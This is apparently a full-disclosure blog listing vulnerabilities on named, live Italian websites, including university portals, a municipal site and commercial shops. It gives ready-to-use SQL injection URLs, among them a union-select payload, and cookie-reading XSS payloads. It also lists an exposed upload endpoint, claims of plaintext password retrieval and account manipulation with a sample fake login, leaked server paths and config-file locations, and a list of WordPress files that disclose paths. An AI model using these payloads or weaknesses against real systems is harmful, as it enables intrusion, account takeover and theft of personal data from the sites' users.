Thursday, 23 November 2017

unina.it/ | blind sql injection, xss, data leak, system compromise etc




http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error: http://archive.is/Zw3Ua
path (leaked from the error): /home/httpd/elettrotecnica/grupponazionale/


XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E



SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(news_data, '%d/%m/%Y') as data ,news_periodo_desc,news_titolo,news_testo,news_allegato_1,news_allegato_2,tnews_id from tnews where news_id = 62


Joomla! with several vulnerabilities:
http://www.diarc.unina.it/
http://www.ceinge.unina.it
http://www.master-ris.unina.it/
http://www.sicc-it.unina.it

___
http://www.concorsi.unina.it/
Passwords are stored in plain text (not hashed) and can be retrieved for all the registered users.

Anybody can register and manipulate other accounts.
(sample fake account)
Codice Fiscale (tax code): RDLRLF80A01D247M
Password: RVENDOMIEU
Nome (first name): radolfo
Cognome (surname): radolfo
Data di Nascita (date of birth): 1/01/1980
http://www.concorsi.unina.it/dottric/iscrizione/insertUser.jsp

http://www.concorsi.unina.it/dottric/IdentificazioneAmm.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Elenco.jsp
http://www.concorsi.unina.it/dottric/Amministrazione/recuperaPwd.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT131
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT111
http://www.concorsi.unina.it/dottric/visualizzazione/DettagliLingue.jsp?bando=DOTT131


__
http://www.sba.unina.it
uses the Glizy framework
The framework is outdated http://www.minervaeurope.org/structure/workinggroups/userneeds/prototipo/cms/download.html

/admin/index.php
MW/config/config.xml <--- where you can find the configuration data

______
http://www.medicinacds.unina.it
I used the previously registered RDLRLF80A01D247M and, as suggested by the errors (M3900XXXX), a random "matricola" (student ID number), M39001234
Anno (year): 6
Nome (first name): radolfo
Cognome (surname): radolfo


We can also force the booking ("prenotazione") by choosing a different value for "scelta"
sample: http://www.medicinacds.unina.it/ade/rec_scheda.php?scelta=563

When submitting data we can subscribe/book other people, modify the submitted "matricola", get the user data (including password).


No authorization/login is needed to view the calendar
http://www.medicinacds.unina.it/ade/ade_calendarioperanno.php
archived: http://archive.is/9ws87



Several other problems (Tomcat, outdated software and so on). Quite boring...
Note: I haven't modified any record or dumped/saved any confidential information.

Tuesday, 21 November 2017

http://mariorossi.it/ | XSS


http://mariorossi.it/categoria.cfm?cat=15&findcateg=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Friday, 17 November 2017

sefsas.it | sql injection



SQL injection in the email confirmation URL (there are several others):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

e.g.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

sample of the full query echoed in the output:

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived: http://archive.is/xDVeh

Sunday, 12 November 2017



XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error: http://archive.is/9bJfo

Friday, 10 November 2017

http://www.informaprezzi.it/ | sql injection



http://www.informaprezzi.it/catalogo/gotourl.asp?idprod=[sql injection]

archived error: http://archive.is/spRdB

Monday, 6 November 2017

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path


URLs that, when requested directly, raise PHP errors containing the local folder path on WordPress 4.8.3 and earlier (only when the server displays PHP errors; with display_errors off you just get a blank page or a 500):

/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav-menu-control.php
/wp-includes/customize/class-wp-customize-nav-menu-item-control.php
/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php
/wp-includes/customize/class-wp-customize-nav-menu-location-control.php
/wp-includes/customize/class-wp-customize-nav-menu-name-control.php
/wp-includes/customize/class-wp-customize-nav-menu-section.php
/wp-includes/customize/class-wp-customize-nav-menu-setting.php
/wp-includes/customize/class-wp-customize-nav-menus-panel.php
/wp-includes/customize/class-wp-customize-new-menu-control.php
/wp-includes/customize/class-wp-customize-new-menu-section.php
/wp-includes/customize/class-wp-customize-sidebar-section.php
/wp-includes/customize/class-wp-customize-site-icon-control.php
/wp-includes/customize/class-wp-customize-theme-control.php
/wp-includes/customize/class-wp-customize-themes-section.php
/wp-includes/customize/class-wp-customize-upload-control.php
/wp-includes/customize/class-wp-widget-area-customize-control.php
/wp-includes/customize/class-wp-widget-form-customize-control.php


/wp-includes/ID3/module.audio-video.asf.php
/wp-includes/ID3/module.audio-video.flv.php
/wp-includes/ID3/module.audio-video.matroska.php
/wp-includes/ID3/module.audio-video.quicktime.php
/wp-includes/ID3/module.audio-video.riff.php
/wp-includes/ID3/module.audio.ac3.php
/wp-includes/ID3/module.audio.dts.php
/wp-includes/ID3/module.audio.flac.php
/wp-includes/ID3/module.audio.mp3.php
/wp-includes/ID3/module.audio.ogg.php
/wp-includes/ID3/module.tag.apetag.php
/wp-includes/ID3/module.tag.id3v1.php
/wp-includes/ID3/module.tag.id3v2.php
/wp-includes/ID3/module.tag.lyrics3.php

/wp-includes/IXR/class-IXR-clientmulticall.php
/wp-includes/IXR/class-IXR-introspectionserver.php

/wp-includes/Requests/Auth/Basic.php

/wp-includes/Requests/Exception/HTTP.php

/wp-includes/Requests/Exception/HTTP/304.php
/wp-includes/Requests/Exception/HTTP/305.php
/wp-includes/Requests/Exception/HTTP/306.php
/wp-includes/Requests/Exception/HTTP/400.php
/wp-includes/Requests/Exception/HTTP/401.php
/wp-includes/Requests/Exception/HTTP/402.php
/wp-includes/Requests/Exception/HTTP/403.php
/wp-includes/Requests/Exception/HTTP/404.php
/wp-includes/Requests/Exception/HTTP/405.php
/wp-includes/Requests/Exception/HTTP/406.php
/wp-includes/Requests/Exception/HTTP/407.php
/wp-includes/Requests/Exception/HTTP/408.php
/wp-includes/Requests/Exception/HTTP/409.php
/wp-includes/Requests/Exception/HTTP/410.php
/wp-includes/Requests/Exception/HTTP/411.php
/wp-includes/Requests/Exception/HTTP/412.php
/wp-includes/Requests/Exception/HTTP/413.php
/wp-includes/Requests/Exception/HTTP/414.php
/wp-includes/Requests/Exception/HTTP/415.php
/wp-includes/Requests/Exception/HTTP/416.php
/wp-includes/Requests/Exception/HTTP/417.php
/wp-includes/Requests/Exception/HTTP/418.php
/wp-includes/Requests/Exception/HTTP/428.php
/wp-includes/Requests/Exception/HTTP/429.php
/wp-includes/Requests/Exception/HTTP/431.php
/wp-includes/Requests/Exception/HTTP/500.php
/wp-includes/Requests/Exception/HTTP/501.php
/wp-includes/Requests/Exception/HTTP/502.php
/wp-includes/Requests/Exception/HTTP/503.php
/wp-includes/Requests/Exception/HTTP/504.php
/wp-includes/Requests/Exception/HTTP/505.php
/wp-includes/Requests/Exception/HTTP/511.php
/wp-includes/Requests/Exception/HTTP/Unknown.php

/wp-includes/Requests/Hooks.php
/wp-includes/Requests/Proxy/HTTP.php
/wp-includes/Requests/Transport/cURL.php
/wp-includes/Requests/Transport/fsockopen.php

/wp-includes/rest-api/class-wp-rest-response.php
/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php
/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php

/wp-includes/SimplePie/Cache/DB.php
/wp-includes/SimplePie/Cache/File.php
/wp-includes/SimplePie/Cache/Memcache.php
/wp-includes/SimplePie/Cache/MySQL.php
/wp-includes/SimplePie/Core.php

/wp-includes/class.wp-scripts.php
/wp-includes/class.wp-styles.php
/wp-includes/class-feed.php
/wp-includes/class-http.php
/wp-includes/class-IXR.php
/wp-includes/class-simplepie.php
/wp-includes/class-snoopy.php
/wp-includes/class-walker-category.php
/wp-includes/class-walker-category-dropdown.php
/wp-includes/class-walker-comment.php
/wp-includes/class-walker-nav-menu.php
/wp-includes/class-walker-page.php
/wp-includes/class-walker-page-dropdown.php
/wp-includes/class-wp-customize-control.php
/wp-includes/class-wp-customize-panel.php
/wp-includes/class-wp-customize-section.php
/wp-includes/class-wp-customize-setting.php
/wp-includes/class-wp-feed-cache.php
/wp-includes/class-wp-http-ixr-client.php
/wp-includes/class-wp-http-requests-hooks.php
/wp-includes/class-wp-http-requests-response.php
/wp-includes/class-wp-image-editor-gd.php
/wp-includes/class-wp-image-editor-imagick.php
/wp-includes/class-wp-simplepie-sanitize-kses.php
/wp-includes/class-wp-text-diff-renderer-inline.php
/wp-includes/class-wp-text-diff-renderer-table.php
/wp-includes/class-wp-user-meta-session-tokens.php
/wp-includes/class-wp-xmlrpc-server.php
/wp-includes/compat.php
/wp-includes/default-filters.php
/wp-includes/default-widgets.php
/wp-includes/embed-template.php
/wp-includes/feed-atom-comments.php
/wp-includes/feed-atom.php
/wp-includes/feed-rss.php
/wp-includes/feed-rss2-comments.php
/wp-includes/feed-rss2.php
/wp-includes/functions.php
/wp-includes/locale.php
/wp-includes/media.php
/wp-includes/ms-default-filters.php
/wp-includes/ms-settings.php
/wp-includes/nav-menu-template.php
/wp-includes/registration-functions.php
/wp-includes/registration.php
/wp-includes/rss-functions.php
/wp-includes/rss.php
/wp-includes/script-loader.php
/wp-includes/session.php
/wp-includes/template-loader.php
/wp-includes/wp-diff.php
/wp-includes/vars.php
/wp-includes/update.php



/wp-content/plugins/hello.php



.... and more


Saturday, 28 October 2017

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise




Joomla com_fabrik vulnerabilities

raise the SQL injection error:
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived: http://archive.is/6XtTl

path (leaked from the errors)
/web/htdocs/www.comuneguardiasanframondi.gov.it/
